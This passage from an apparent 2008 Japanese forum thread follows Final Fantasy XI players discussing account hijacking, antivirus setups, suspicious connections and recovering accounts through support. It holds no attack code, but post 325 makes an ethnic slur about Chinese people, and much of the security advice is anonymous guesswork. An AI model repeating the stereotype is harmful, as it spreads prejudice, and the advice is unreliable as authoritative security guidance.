アカハックされた奴はPOLのメールパスも抜かれてるから注意な
298 :
既にその名前は使われています :2008/09/11(木) 12:11:17 ID:XEqKrORb
げ、今ログインしちまったwww>PC リアルプレイヤー今現在使用中なんだが、消さんとやばいんか なんだかちょっと入らない間にいろんなことが・・・浦島状態だわw
299 :
既にその名前は使われています :2008/09/11(木) 13:33:51 ID:xuzNbxr8
>>298 ログイン時に変な挙動起きてない?
おきなかったら多分大丈夫だと思う。
私も同じようにPCからの起動は(ウイルス騒動があってから)してないけど、
PS2から起動して半年、まだ取られて無い。
300 :
既にその名前は使われています :2008/09/11(木) 13:38:17 ID:xuzNbxr8
>>287 繋がらないなら向こうの鯖がメンテだっただけじゃない?
もしくはすでに自分のPCが(ヴァナモンに入る前から)ハック受けてる場合もあるけど。
閲覧数が多いとテンポったりするよね、ヴァナモン
302 :
既にその名前は使われています :2008/09/11(木) 15:32:46 ID:ARnf7grN
age
303 :
既にその名前は使われています :2008/09/11(木) 15:52:42 ID:s5ocxpYk
>>288 今はパスは7桁以上でないとダメになってる。
サポセンが仮パスだしてるのかも、聞いてみそ。
今インしようとしたら、パスワードかIDが違いますと言われ(3回) 不正アクセスチャットに新しいID教えてもらって入ったけど 何も変わってなかった、これって後で入ろうとしてパス変えたのかな?
おい待て まさかとは思うが何の対策もせずに入ったのか?
だとしたら極上の馬鹿だが・・・ まさかな
>>2 のテンプレよろ
>>304 とりあえずハックして即パス変えたが
キャラ資産見たら微妙だったので
高額アイテムがある垢を先にやって暇な時にでも取るか
という感じかもしれん
307 :
既にその名前は使われています :2008/09/11(木) 17:13:19 ID:i61RPvcE
>>306 想像して噴いたw
俺のも何も取られていなかったけど気味が悪かったんで課金停止してウェブマネに変更した
ところで業者ってパス抜いて課金停止されている垢だったらわざわざ課金するもんなの?
308 :
既にその名前は使われています :2008/09/11(木) 17:18:34 ID:Eeg7wxJ9
新しいID教えてもらえる時代になったのかw
309 :
既にその名前は使われています :2008/09/11(木) 17:19:21 ID:PdV0Qmi8
310 :
既にその名前は使われています :2008/09/11(木) 17:22:39 ID:+/20YCgs
>>307 するんじゃね
大金持ったままフェードアウトした連中もいるんだろうし
なにもなかったらそのまま寝釣りに利用する手もある
311 :
既にその名前は使われています :2008/09/11(木) 17:43:21 ID:zmOEx7Pk
312 :
既にその名前は使われています :2008/09/11(木) 17:49:23 ID:99TNnVHj
>>258 あ、なるほど・・・。
自分も今まで来なかったけど、最近高額アイテムを買ったわ。
313 :
既にその名前は使われています :2008/09/11(木) 17:52:57 ID:99TNnVHj
>>307 ニコニコでハックされた人の動画が出てたけど、課金停止してたのに
課金されてアイテムをとられたらしいよ。
314 :
既にその名前は使われています :2008/09/11(木) 17:55:01 ID:+/20YCgs
ペンギン村の住人だけど 不正アクセスの調査依頼で免許証コピー送ったら なんとか本人確認とってもらえたよ ナメック星人とかの人朗報
315 :
既にその名前は使われています :2008/09/11(木) 17:55:54 ID:+/20YCgs
ほんとかよって声があればメール貼るぜ
317 :
既にその名前は使われています :2008/09/11(木) 20:23:04 ID:bFHLNMYn
266からあげ
318 :
既にその名前は使われています :2008/09/11(木) 21:23:25 ID:Ha8stJ0P
229からあげ
319 :
既にその名前は使われています :2008/09/11(木) 21:49:48 ID:+/20YCgs
パス再発行でインしたら 英語でPOLGM呼んだあとっぽいメッセージが 大量に残ってた 凍結解除しようとしてあれこれ試したのかな
外人にアカウント売られていたんじゃないかと勝手な予想
321 :
既にその名前は使われています :2008/09/11(木) 22:20:49 ID:+/20YCgs
たしかに英語圏のやつぽかったなー メイン垢でtellしたとき
322 :
既にその名前は使われています :2008/09/11(木) 22:43:46 ID:EpeQPks0
>>313 ベジータ王子の動画結構好きだったから、かわいそうだわ。
でもウイルス対策とかもしてなかったみたいだし油断しすぎだわw
323 :
既にその名前は使われています :2008/09/11(木) 23:03:16 ID:99TNnVHj
>>322 自分も好きw
でもウィルス対策はしないといかんよな。
自分が発信源になることもあるわけだから、自分一人の問題じゃない。
324 :
既にその名前は使われています :2008/09/12(金) 00:40:49 ID:MQYhm9PP
251からあげ
325 :
既にその名前は使われています :2008/09/12(金) 00:44:00 ID:3aUk2teY
>>314 免許証送ったなら向こうでなんとかできるからな。
IPから日本かどうか、IP管理者から実在する人間かどうか確認出来る。
中華だと、名前は偽者を名乗るのが文化だとかぬかす人種だから、カットしやすいしなー
326 :
既にその名前は使われています :2008/09/12(金) 00:58:17 ID:9yQHNikc
かちゅの板更新に、いつもhimajin氏のサイトから更新ファイルを落として 使わせてもらってるけど、サイトxreaだったのね。 tp://hima2908●s151●xrea●com/ ここだけど、素人なりにチェックしてみたけど大丈夫だよね? インラインでamazonがいくつかあるけど。 と言ってもブックマークから操作ミスって既に飛んじゃって、すぐ戻ったけど ヤバかったら意味無いか・・・
327 :
既にその名前は使われています :2008/09/12(金) 01:02:50 ID:7LiaMaq/
>>326 俺もざっとみただけだけど改竄とかはされてなさそうだから大丈夫だとは思う
328 :
既にその名前は使われています :2008/09/12(金) 01:05:17 ID:bB0R8IyJ
お休みまえのあげ。
329 :
既にその名前は使われています :2008/09/12(金) 02:04:08 ID:jQaHkKit
age
330 :
既にその名前は使われています :2008/09/12(金) 03:31:40 ID:QkwajA+Y
俺PS2だけどageといてやるよ おやすみ
331 :
既にその名前は使われています :2008/09/12(金) 06:21:53 ID:jQaHkKit
age
COMODO導入したのですが、Norton360のファイアーウォールOFFは当然しますよね でもあの赤い警告がそわそわしちゃうので、ONにしてみました。 今のところ競合したりとか、異常な動作は視覚的に現れてませんが、そのまま使い続けていいと思いますか? ご意見をお願いします。
333 :
既にその名前は使われています :2008/09/12(金) 08:30:16 ID:UX8T04K+
せめて質問する時は上げないとw 293で維持させちゃダメ!まぁ私は答えられないんですけどね;;
335 :
既にその名前は使われています :2008/09/12(金) 10:09:18 ID:rbwpXCR4
>>332 そういうのが判断できないうちはCfpはお勧めしないよ。
Cfpはセキュリティレベル設定によって超甘いか超五月蝿いか割りと両極端なアラート出してくるからね。
それを自分の環境に合わせて設定することによって初めてCfpは堅いですね。ってことになるわけで。
インスコのときに他のと同時に使ったりすると不具合でるかもよ?って言われたしょ。
そういうことです。
337 :
既にその名前は使われています :2008/09/12(金) 10:55:51 ID:4nCryUol
こんなのまでツールキットになってんのかw 手抜きもいいとこだな。 >Flash Plyayer …
338 :
332 :2008/09/12(金) 11:31:21 ID:Iho4geVS
COMODOまとめサイトに書かれてる手順とセキュリティレベル設定以上の高度なことはまだできないなぁ Excite翻訳しながら、設定していくのはなかなか骨が折れる。 しかしFFしてるとIPごと、ポートごとに設定できて、強固なのはなんとなくわかる
339 :
既にその名前は使われています :2008/09/12(金) 13:07:06 ID:8xJA9wPb
勝手にフレ登録が増えてたw 外人に売ったのかなw
340 :
既にその名前は使われています :2008/09/12(金) 13:07:11 ID:36U0corC
age
341 :
既にその名前は使われています :2008/09/12(金) 13:10:33 ID:bBQO6Ttz
342 :
既にその名前は使われています :2008/09/12(金) 13:11:20 ID:4p2ynmLS
>>336 >出来上がったページは本物のYouTubeそっくりのデザインで、
>例えば「Flash Plyayerの最新版が必要です」などのメッセージを表示してユーザーをだまし、
>プラグインをインストールするように偽装しながらマルウェアに感染させることができるという。
もしNoscriptの警告に偽装されてたらうっかり押しちゃうかもしれない
怖いな
343 :
既にその名前は使われています :2008/09/12(金) 13:13:51 ID:wS4e0PtR
>>341 Vistaベースだからな
管理者権限の上、超管理者権限が実装。
ファイルを削除します。宜しいですか?
あなたは管理者ですか?
ファイルを削除します。本当に宜しいですか?
本当の本当の本当によろしいですか?
削除したら元に戻せないかもしれませんが、いいんですね?
ファイルをごみ箱に移動しました。
とかいうセキュリティ強化をやってくるかもしれんな。
344 :
既にその名前は使われています :2008/09/12(金) 14:38:37 ID:qiw6A5vO
>>343 垢ハックが怖いからVistaに戻したんだがwindowsの起動に5分とかシャレにならん
345 :
既にその名前は使われています :2008/09/12(金) 15:34:13 ID:0AXG+Wk9
アカハックがこんなに蔓延してるのに スクエニときたらファイナルファンタジーXIを推奨PCでプレイしよう っていうメールを送りつけてきた件について。
346 :
既にその名前は使われています :2008/09/12(金) 15:50:00 ID:wS4e0PtR
>>345 FF推奨PCが売れる=スクエニすごい!と店に喜んでもらえる、だな。
347 :
既にその名前は使われています :2008/09/12(金) 16:00:19 ID:elOTXlfA
>>345 このスレ的な解釈をすると
「FF専用のPCを用意してね!」
ってことだと思う(´・ω・`)
むしろ■が専用機用意すりゃいいんじゃね
349 :
既にその名前は使われています :2008/09/12(金) 18:03:38 ID:ctRROkpk
ノートンの新しいやつはカスペの様に垢ハックウィルスに全て対応したんかな?
>>345 そのFF推奨PCで垢ハックされて引退したんだが・・・
351 :
既にその名前は使われています :2008/09/12(金) 18:13:23 ID:m27nO+Gl
スレ読んでると、カスペと仮想環境の普及率高いような錯覚に落ちるw
>>349 カスペがすべて対応しているとは初耳。というかその誤解が怖いw
>>350 スペックとセキュリティは別物ですよ。
>>350 ■e>FF推奨PCでFF以外のことをやるな
昔のワープロ専用機みたいな、FFを専用機を■が販売するとかw High5000ぐらいの性能でいいなら、いまなら4,5万あればおつり来るよね?
354 :
既にその名前は使われています :2008/09/12(金) 19:13:32 ID:zTMuUFTl
もしかしてPS2ってFF専用機に最適なんじゃね?
いまごろかよ
PS2は画面がもう少し広ければ良かったんですけどね・・・・
357 :
既にその名前は使われています :2008/09/12(金) 19:42:01 ID:x2kDK6fK
>>356 画像ってPCに取り込めると思ったけど
どこかで読んだ気がするんだけど違ったかな
358 :
既にその名前は使われています :2008/09/12(金) 19:42:47 ID:Ebh+eCiA
買う人間が馬鹿だからだろ? お水系馬鹿が元ヤンりようしwにせがまれてメールできた物をブランド感覚で買いまくり。 そして気に入らなければポイ。 それを実働でしている■もカス会社としか言いようが無いがな。
359 :
既にその名前は使われています :2008/09/12(金) 19:55:55 ID:x2kDK6fK
ヤベ ホントにわかんねぇんだけど・・・ 解説プリーズ
361 :
既にその名前は使われています :2008/09/12(金) 20:11:58 ID:aON4awQd
>>354 PS2はもう少しで終わるんじゃなかった?
今PC使っているならすぐ戻ってくるわけだし×箱かPCセキュリティ強化がいいと
362 :
既にその名前は使われています :2008/09/12(金) 21:52:33 ID:nfW0g89O
ほしゅ
363 :
既にその名前は使われています :2008/09/12(金) 21:58:09 ID:v0fCe7WV
>>361 出来ればPS3専用クライアント出して欲しけれど
箱○でのラインナップみると絶望的だよな・・・FF13シリーズで
成功して翻意してくれると良いのだけれど・・・
まぁ最悪箱○に力入れて快適に動く様になったら箱○に移るけれどw
364 :
既にその名前は使われています :2008/09/12(金) 23:06:33 ID:3aUk2teY
>>363 喧嘩売る訳じゃないけど…どう絶望的だと思った?
確かに今箱〇じゃ、日本人が好みそうなゲーム作られては無いけど。
これは、海外向けに出した方が、カス当たりでも最低10万は保証されてるからなんだよねー
だから、多分貴女が抱いている今後発売されると思ってるゲームは今後一生発売されない可能性もあるんだけど…
一応それを踏まえた上で、どう絶望的か聞かせて欲しい。
365 :
既にその名前は使われています :2008/09/12(金) 23:11:41 ID:5MuBSByb
>>363 箱○はアメリカ人向けのを、無理やり日本人向けに
したようなもんだから
PSシリーズと比べるのはどうかと思うがw
366 :
既にその名前は使われています :2008/09/12(金) 23:26:05 ID:17bPOMtW
かなり初歩的な意味が判らない; 「PS3で出して欲しいけど 箱○で出ているゲーム各々を見てみると それは絶望的だ」 って事なんだね? 箱○のゲームを見て…ってあたりの事情がよく判らない;
367 :
既にその名前は使われています :2008/09/12(金) 23:31:17 ID:HLDif1KB
PS3でできるFFXI出して欲しい。 X箱360のほうはやりたいゲームでてないし。 ということだとおもわれ。 X箱360は中国の工場で故障率バツ牛ンらしいし。
368 :
既にその名前は使われています :2008/09/12(金) 23:42:24 ID:17bPOMtW
なるほど 外人で垢ハック対策でPCから×箱に乗り換えた人物も居ると このスレで見たことがあるけど そうは行かない人も多いだろうな(自分もそうだし すると今度はその後どうして 喧嘩を売られてるのか判らないな 「海外向けに出した方が売れるからなんだよ〜 だから×箱で目ぼしいタイトルが出る可能性は 薄いんだよね〜 で、なんで絶望的なの?」 って言ってるんだよね? どゆこと?
369 :
既にその名前は使われています :2008/09/13(土) 00:26:00 ID:fNmU3CKT
おやすみまえのあげ。
370 :
既にその名前は使われています :2008/09/13(土) 00:29:14 ID:dgWR6L9Z
■eのラインナップがPS3より箱優先(FF13の件もあったしの)に映るから このままの路線だとPS3版が開発されるのは絶望的に思える ってことじゃないのかい
371 :
既にその名前は使われています :2008/09/13(土) 00:33:50 ID:an3zT+oK
>>370 次世代MMOをPS3で開発中なんだろね。
FF13商法のシリーズの一つが次世代MMOだったりしてw
372 :
既にその名前は使われています :2008/09/13(土) 00:34:09 ID:qCglIX7j
>>370 ハイ、そんな所です。拙くて御免なさい。
373 :
既にその名前は使われています :2008/09/13(土) 01:06:28 ID:ZRsMcFiw
おやすみage
374 :
既にその名前は使われています :2008/09/13(土) 01:38:37 ID:+Z61/tOb
アプリケーション:LuComSever_3_4.EXE 送信先IP:60.254.130.24:HTTP 25280.ftp□download2□akadns というところにアクセスしよとするのですが。これは大丈夫なのでしょうか? 何のプログラムがアクセスしようとしているのがわからないのが現状です(´・ω・`) 本日から急に発生しました。 最近インスコしたプログラムもないのになぁ…
375 :
既にその名前は使われています :2008/09/13(土) 01:44:43 ID:5O7r5QnG
>>374 シマンテック製品のLiveUpdate関係っぽい
376 :
既にその名前は使われています :2008/09/13(土) 01:52:52 ID:+Z61/tOb
>>375 即の回答ありがうございます。
たしかにパソコンにはノートンが入っております、ただ気になる点は…いままでこのようなアクセス要求がなかったため…
377 :
既にその名前は使われています :2008/09/13(土) 01:56:41 ID:AegNeeiB
>>376 なにかほかにセキュリティに関係するソフトは入れませんでしたか?
378 :
既にその名前は使われています :2008/09/13(土) 02:00:24 ID:GgE1Nccy
ノートンの自動更新によって、LiveUpdate関係に変更があったということではにぃのか
379 :
既にその名前は使われています :2008/09/13(土) 02:07:43 ID:+Z61/tOb
>>377 ここ数日で追加したセキュリティーソフト関連等はありません(;´д`)
>>378 カスペオンラインで検索かけたところ現時点での結果は白でした…ノートンのアップデート方式が変更されただけなのかなぁ…この週末だけに、不安が(´・ω・`)
380 :
既にその名前は使われています :2008/09/13(土) 02:27:46 ID:AegNeeiB
>>379 ファイアウォールの処理の仕方は自動(推奨)になっていますか?
判断できなければ自動にしておいたほうが無難ですよ
381 :
既にその名前は使われています :2008/09/13(土) 02:41:59 ID:+Z61/tOb
>>380 ファイアウォールはウィンドウズとノートンにてオンになっております。
またノートンのホムペ閲覧しようとするとなぜかPGにて香港 中国が反応しちゃうのですが…(;´д`)
382 :
既にその名前は使われています :2008/09/13(土) 02:52:28 ID:AegNeeiB
383 :
既にその名前は使われています :2008/09/13(土) 03:06:53 ID:AegNeeiB
384 :
既にその名前は使われています :2008/09/13(土) 06:54:42 ID:ofhyBUvM
age
sage
386 :
既にその名前は使われています :2008/09/13(土) 07:56:08 ID:tl+y3k8G
特に気にしていなかったセキュリティ たまたまたどり着いたここを見てセキュリティ関連のソフトをいくつも入れた。 完璧なので狙ってここには来ない。 コンクリフトが発生するのでFFXIプレイ中は停止させることが多い。 今そんな奴が多数いるのだろうか。
387 :
既にその名前は使われています :2008/09/13(土) 08:47:26 ID:Vl1LQu7i
>>370-
>>372 情報・解説ありがとう
ウィルスってのは「油断」じゃなくて
「もののはずみ」で感染するから
(うっかり添付ファイルを触ってしまった、その気も無いのにURLを踏んでしまった
普段からの注意喚起と対策が必要だぁね〜
388 :
既にその名前は使われています :2008/09/13(土) 09:34:26 ID:+Z61/tOb
>>383 こんなページがあったなんて…自分でも探したつもりだたのに。ほんとありがとうございました。
389 :
既にその名前は使われています :2008/09/13(土) 12:29:59 ID:de5c2sQ1
保守
※通報スレとのマルチポスト失礼 Kujata 白門で装備品バザーシャウトを繰り返しているSiloxというキャラクターが ハックされたアカウントの可能性が高い。装備品を軒並みバザーしている。 GMコールにて本人確認を養成しているので、支援お願いします。
391 :
既にその名前は使われています :2008/09/13(土) 14:13:43 ID:4FkV9d2y
>>386 どれくらいの量のソフトを常駐させておみえなのかわかりませんが
セキュリティ関係では6個常駐させていてコンクリフトの経験はありません
(セキュリティ以外にもいくつか常駐してます)
392 :
既にその名前は使われています :2008/09/13(土) 16:07:13 ID:s2i1cQYz
age
393 :
既にその名前は使われています :2008/09/13(土) 17:14:25 ID:mVnHsvAK
やはりここはこれを貼るしか無かろう。 漏れはノートン、バスター、NOD32、Bitdefender,AVAST!常駐最強(´・ω・)ス 最初にバスターを入れれば複数いける(´・ω・)ス 普段は不具合ないけどウィルス発見したときすごいことになる(´・ω・)ス ソフト同士で取り合いを起こす(´・ω・)ス ノートン「とったどー! 隔離する(´・ω・)ス!」 バスター「(ノートンの隔離フォルダから)とったどー! 隔離する(´・ω・)ス!」 ノートン「(バスターの隔離フォルダから)また見つけたどー!」 って繰り返す(´・ω・)ス テラバカ(´・ω・)ス あとむちゃくちゃ重くなるから常用は無理(´・ω・)ス
395 :
既にその名前は使われています :2008/09/13(土) 18:53:53 ID:dgWR6L9Z
>>394 それ初出いつだっけ、2年前?懐かしいのう
396 :
既にその名前は使われています :2008/09/13(土) 18:57:22 ID:QPMUd2O4
山田ヲチスレっ(´・ω・) スカ
397 :
既にその名前は使われています :2008/09/13(土) 19:03:44 ID:4FkV9d2y
>>393 一般的なものだけしか入れてませんけど・・・
んと、NIS2008・Spybot・Unleak・PG2・Windows defender・PSI
FF用PCとネット用PC、どちらも同じです
398 :
393 :2008/09/13(土) 19:07:13 ID:4FkV9d2y
Spyware Blasterは常駐じゃなかったと思うので除きました
399 :
397 :2008/09/13(土) 19:08:20 ID:4FkV9d2y
397だろおぃ>わたし
400 :
既にその名前は使われています :2008/09/13(土) 19:18:01 ID:QPMUd2O4
カスペとノートン併存させたい
401 :
既にその名前は使われています :2008/09/13(土) 20:53:49 ID:s2i1cQYz
mage
山田ヲチスレ見てたなぁ、ダウソ板住人ではないがあれだけは楽しかったw
403 :
既にその名前は使われています :2008/09/13(土) 22:07:04 ID:qCglIX7j
>>402 人の不幸は蜜の味、ですね。分かります。
うむ ジョブ板の暗黒スレに突撃したりとかな・・・w
405 :
既にその名前は使われています :2008/09/13(土) 23:38:29 ID:4FkV9d2y
232からあげ
406 :
既にその名前は使われています :2008/09/13(土) 23:45:37 ID:tl+y3k8G
407 :
既にその名前は使われています :2008/09/14(日) 00:38:37 ID:IyMbqSxr
おやすみ前のあげ。
408 :
既にその名前は使われています :2008/09/14(日) 01:36:59 ID:hIiFn3Kn
>>327 レスありがとう。
全部のサイトでは無いけどやはり気になってしまう(´・ω・`)
409 :
既にその名前は使われています :2008/09/14(日) 02:26:49 ID:gXM0WY+j
ほしゅして寝る
411 :
既にその名前は使われています :2008/09/14(日) 03:59:42 ID:CZe0gGnX
いきなりスレ数が170とかになってて焦った ほしゅほしゅ
412 :
既にその名前は使われています :2008/09/14(日) 04:18:01 ID:ydT79994
かすぺる入れてFF11やりはじめたんだけど C:\Program Files\PlayOnline\SquareEnix\PlayOnlineViewer\pol.exe でkeylogger警告してくるんだけど これは許可だしちゃっていいのかな?
413 :
既にその名前は使われています :2008/09/14(日) 06:10:26 ID:VguciVYr
>>412 それはいいよ許可して
そして別のセキュリティソフトに変えるといいよ
414 :
既にその名前は使われています :2008/09/14(日) 07:05:19 ID:hmVnTC4f
セキュリティソフトとしてマカフィーの評価はどう? デスクは360だが、ノートが360入れるとエラー多くて デフォで入ってたマカフィー使ってるんだ。 保守揚げ
415 :
既にその名前は使われています :2008/09/14(日) 07:14:00 ID:MozNiAjf
しばらく休止または引退していて復帰した浦島太郎ほど、垢ハックされやすい。 今のこの状況を知らないため、復帰したフレがいたらまず垢ハックのことを教えてやるべき。
416 :
既にその名前は使われています :2008/09/14(日) 09:04:57 ID:fb7zNgqE
保守 新型には気をつけよう。
最近報告少ないな ちっとは沈静化したのだろうか
418 :
既にその名前は使われています :2008/09/14(日) 09:20:41 ID:NUP/i1aL
んなことはない。 久々にフレからtellがきて、「垢ハックされてた;;」報告とかあるし。
419 :
既にその名前は使われています :2008/09/14(日) 09:24:26 ID:nJpLIqr2
>>397 普通こういうスレで併用が問題になるのは
>>394 のコピペみたいに同じ系統(コピペの場合はウィルスに対する常駐保護)のソフトを複数同時に動かしたときのことだよ。
>>397 のはそれぞれがやってる処理がほとんどかぶってないから問題が起きないんじゃないかな。
まあそもそもの始まりの
>>386 は、
導入してもゲーム中OFFにしちゃうやつもいるのかなぁ、っていう程度の想像の話しみたいけどな。
420 :
既にその名前は使われています :2008/09/14(日) 10:02:06 ID:VguciVYr
俺の周りでは一部機能をOFFするてのを聞いた あれはその類かもしれないなぁ一部OFFって言ってたから多少は理解している人間だろうけど
421 :
既にその名前は使われています :2008/09/14(日) 10:04:17 ID:I6YtxuzT
知識がないヤツは金を使え、金がないヤツは知識を使え。 両方無いヤツは勉強して知識を身につけろ。
レジストリエディタでwzcsvbxm.dllが見つかった場合は OS毎クリーンインストールしなきゃダメなんですかね?
また検索履歴か
424 :
既にその名前は使われています :2008/09/14(日) 12:01:32 ID:doq0d6fN
昼飯前にage
POLID登録時未成年だったので年齢詐称 8/17 垢ハック 8/17 凍結 8/18 復旧依頼&書類郵送 8/20 書類受理→データと違うので復旧できませんとメール 8/21 サポセンを問い詰める→本人確認できたので引き続き復旧します 9/14 巻き戻し完了メール パス変更、復旧以来のときにも生年月日のことを聞かれててGMの方が訂正しときます的なことを 言ってたのですが、訂正されてなくてちょっと困ったぜ
やっと復旧完了メールきたああああああ!!!! 日曜に来るとは想定外だったぜ!
427 :
既にその名前は使われています :2008/09/14(日) 14:15:23 ID:OOrf5cp+
>>426 ____
/ \
/ _ノ ヽ、_ \
/ o゚⌒ ⌒゚o \ 派遣だから3連休なのに休み無しで頑張ってるお
| (__人__) |
\ ` ⌒´ /
428 :
既にその名前は使われています :2008/09/14(日) 14:45:56 ID:NdxGiopy
ありゃ、巻き戻し報告スレ落ちちゃったか・・・
422で書き込みしたものですが 最近POL起動してインしようとすると2回ほど強制終了して その後インできるんですが、これは危険ですよね?
430 :
既にその名前は使われています :2008/09/14(日) 16:33:51 ID:yOpBXy2w
きけんだよー
431 :
既にその名前は使われています :2008/09/14(日) 16:34:14 ID:H034iIa3
>>429 それなら最初からそう書くべし。422のレス内容だけじゃ端的すぎて
何もアドバイスできないよ。
恐らく感染してもうパスも中華に握られてるだろうから。
安全なハードからパス変更するかGMに頼んで垢凍結してもらってから
クリーンインストール推奨。
なるほど。 OSをクリーンインストールしてその後パス変えるとかじゃダメかな? 今はインできてるもんで。
433 :
既にその名前は使われています :2008/09/14(日) 16:46:21 ID:doq0d6fN
インしてる状態ならPS2とかのリアフレとかにパス変更をお願いするのがえぇんじゃないか? クリーンインスコしてからじゃ間に合わないかも
434 :
既にその名前は使われています :2008/09/14(日) 16:46:59 ID:H034iIa3
>>432 クリンスコ>各種ドライバインスコ>FFインスコ>パッチDLの間に
ハックされる可能性があることを認識した上でNGかOKかは自分で判断しる
勉強になるます
んでは垢凍結してもらい、
>>434 の作業していけば安全なんですな
つかどっから潜り込んだんだ・・
436 :
既にその名前は使われています :2008/09/14(日) 17:01:35 ID:yvY+UhpV
ギアス実況はじまったから保守
>425 POLは未成年でも「親権者の承諾をとってプレイする本人の名義で契約しろ」って マニュアルにも書いてあるんだが。Q&Aにもあったかな。 カード支払いも、カード名義人と契約者別でできる。 マニュアルとか全く読まずに勝手に行動する人なんだろうね。 そんでサポセン問い詰めるとかバカなの?
438 :
既にその名前は使われています :2008/09/14(日) 18:50:14 ID:H0KSdHqI
落ちすぎだろ
439 :
既にその名前は使われています :2008/09/14(日) 18:51:49 ID:H034iIa3
>>435 感染してたってことはセキュリティが甘いってことだから、
クリンスコしたら無料の体験版でもいいからアンチウイルスソフト導入しなよ
440 :
既にその名前は使われています :2008/09/14(日) 20:51:27 ID:RmCtMMQW
ageなきゃいけない!
441 :
既にその名前は使われています :2008/09/14(日) 23:09:22 ID:mZgdUS4q
age
442 :
既にその名前は使われています :2008/09/14(日) 23:12:21 ID:O2PWbSoI
ほんとピーク時に比べたら、のびなくなったなー 今のところは沈静してるのかねー
Flash対策している人にとっては落ち着いた状況と言っていいとは思うけどね こうなると次のがきそうだから全然安心はできないけどさw
444 :
既にその名前は使われています :2008/09/15(月) 00:10:54 ID:pnU3SrDm
寝る前にage このまま沈静化するといいのにね〜
445 :
既にその名前は使われています :2008/09/15(月) 00:18:52 ID:G0PQciXA
>>433 6月、8月ときたから10月あたりに
本命は正月休み前がかなり危ないと思われ
446 :
既にその名前は使われています :2008/09/15(月) 00:36:07 ID:iq7PCban
IQ7のPCはもれなくBAN
447 :
既にその名前は使われています :2008/09/15(月) 00:47:43 ID:OZp+lgoq
垢ハックされた場合、大体ワールド変えられてるから3000円負担しなきゃ いけないって知ってた?
448 :
既にその名前は使われています :2008/09/15(月) 00:48:54 ID:4w67+cK9
そりゃこれだけ騒がれてるのに 自分だけは大丈夫とおもってるカード支払い組みだろ
449 :
既にその名前は使われています :2008/09/15(月) 00:53:59 ID:OZp+lgoq
カードだろうが、何だろうが請求されるんだよ。 翌月払えって。
450 :
既にその名前は使われています :2008/09/15(月) 01:39:16 ID:JzfsNQxk
FFでクレカとか激やばだろw 近いうちに主要カード会社とか抜けるくらいの勢いだろこれ
451 :
既にその名前は使われています :2008/09/15(月) 01:40:02 ID:HLV9QG74
おやすみ前のあげ。
452 :
既にその名前は使われています :2008/09/15(月) 02:20:55 ID:h4eDAp78
age
453 :
既にその名前は使われています :2008/09/15(月) 02:28:18 ID:Ba54bD5V
454 :
既にその名前は使われています :2008/09/15(月) 03:10:12 ID:h4eDAp78
age
455 :
既にその名前は使われています :2008/09/15(月) 05:43:47 ID:6xVaA7/W
あげ
456 :
既にその名前は使われています :2008/09/15(月) 07:22:26 ID:OZp+lgoq
>>450 クレジットカードの情報はアカウント情報とは別物。
それが抜けたらカード会社が危ういだろうな。
逆にクレジットカードなど、本人確認が取れないとアカウントが取得
できない仕組みにしたほうが良い。業者が仮アカウントを取得できないように。
>>454 外人相手にどこまで有効なんだか。。。
中国はアク禁かつサービス終了にしたほうが良いだろな。
>>450 それ言ったらインターネットでクレカとか、アルバイトの店員のいる店でクレカの方がよっぽどヤバい。
それに普通はクレカが不正使用された場合クレカ会社が負担する。
FF11の場合が該当するかどうかは微妙な気がするが。
458 :
既にその名前は使われています :2008/09/15(月) 10:03:54 ID:OZp+lgoq
Tr●jan-GameThief.Win32.OnLineGames.taru に感染してた。これ新しいよね。 パターン出て間もなくスキャンも出来てないときや、パターン出る前に感染した としても、被害者にユーザIDとパスワードの管理が行き届いてないから、 移転費などはご負担下さいって姿勢はどうなのかな。 長い眼で見たら大きなマイナスになると思うけど。 被害者の立場にたって考えてほしい。
459 :
既にその名前は使われています :2008/09/15(月) 10:21:24 ID:16opgDNs
>>458 被害者の立場に立ったらコスト上がって困るじゃないですか^^;
実際ここ最近のユーザーフレンドリィなver.upって根幹には
サービス開始6年目ってのも大きいだろうけれど課金者が減ってしまったからだろう。
スクエニの運営スタイルからすると問題が大きくなってから対処すればいい、ッてのは
オフゲに於いてもゲーム進行が止まる様なバグがあっても回収しない事があるのを見ると
よく分かると思うので、もっと被害者が増えないと何も変わらないと思う。
少なくとも和田社長は株式会社の社長の鏡の様に株主の言う事は絶対、ッて人だから
株主が守銭奴であるせいだ、とも言えると思う。
最も和田社長だからこそ守銭奴的な株主が増えたのだと思うけれど。
460 :
既にその名前は使われています :2008/09/15(月) 11:02:57 ID:obvUZ7hi
tp://marimo●s137●xrea●com/r.cgi/ff11/maptool さっき間違えて踏んでしまったんだがここってやばかったんだっけ? FireFox+NoScript+PGなんだが
オンラインゲーム=RMTプレイメイン が一番いいという風に育てた世代だろうしなぁ よくある話というか・・・
464 :
既にその名前は使われています :2008/09/15(月) 12:06:07 ID:OZp+lgoq
>>459 今は20万ユーザくらいなのかな?
年間48億くらい?
コスト減できるような対策ツールの充実が急務では。
次に繋げる為にも、セキュリティ面での落度は致命的。
465 :
既にその名前は使われています :2008/09/15(月) 12:44:27 ID:EjFoK+ZS
延々と続いてるハック問題に強い事言える監査組織が無いのが問題 緑川さん立ち上げてくださいおながいします
まずソースネクストみたいなザルを発禁にしてくれ
467 :
既にその名前は使われています :2008/09/15(月) 14:14:15 ID:g2XolT8h
>>460 感染する仕組みをちゃんと理解しておくことが必要ですね
468 :
既にその名前は使われています :2008/09/15(月) 16:24:30 ID:8pDXPvDY
とりあえずage
469 :
既にその名前は使われています :2008/09/15(月) 18:02:57 ID:bJLcsSba
あげ
470 :
既にその名前は使われています :2008/09/15(月) 19:49:21 ID:3YCCFRFY
巻き戻し対応遅すぎ。
471 :
既にその名前は使われています :2008/09/15(月) 20:43:21 ID:djf5rwaD
あげ
472 :
既にその名前は使われています :2008/09/15(月) 22:24:39 ID:Yuxb5Grn
278からの急上昇
473 :
既にその名前は使われています :2008/09/15(月) 23:01:23 ID:OWrRGEdy
腰痛がひどい
474 :
既にその名前は使われています :2008/09/15(月) 23:36:43 ID:HLV9QG74
おやすみ前のあげ。
475 :
既にその名前は使われています :2008/09/16(火) 00:10:49 ID:60f40Z51
オヤスミのあげ
476 :
既にその名前は使われています :2008/09/16(火) 01:45:25 ID:MXdIBTfY
おやすみ
477 :
既にその名前は使われています :2008/09/16(火) 02:36:12 ID:xYBz+wAQ
